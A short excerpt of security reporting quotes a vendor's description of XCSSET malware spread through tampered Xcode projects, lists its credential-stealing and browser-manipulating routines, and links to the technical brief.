Quote
"Presumably, these systems would be primarily used by developers," the team noted. "These Xcode projects have been modified such that upon building, these projects would run a malicious code. This eventually leads to the main XCSSET malware being dropped and run on the affected system."
Below is a summary of the routines we have identified:
• Manipulates browser results
• Manipulates and replace found bitcoin and other cryptocurrency addresses
• Replaces the Chrome download link with a link to an old version package
• Steals Google, Yandex, Amocrm, SIPmarket, Paypal, and Apple ID credentials
• Steals credit card data linked in the Apple Store
• Prevents the user from changing password but can also record the new password if it is changed
• Takes screenshots of certain accessed sites
You can read the paper here: https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf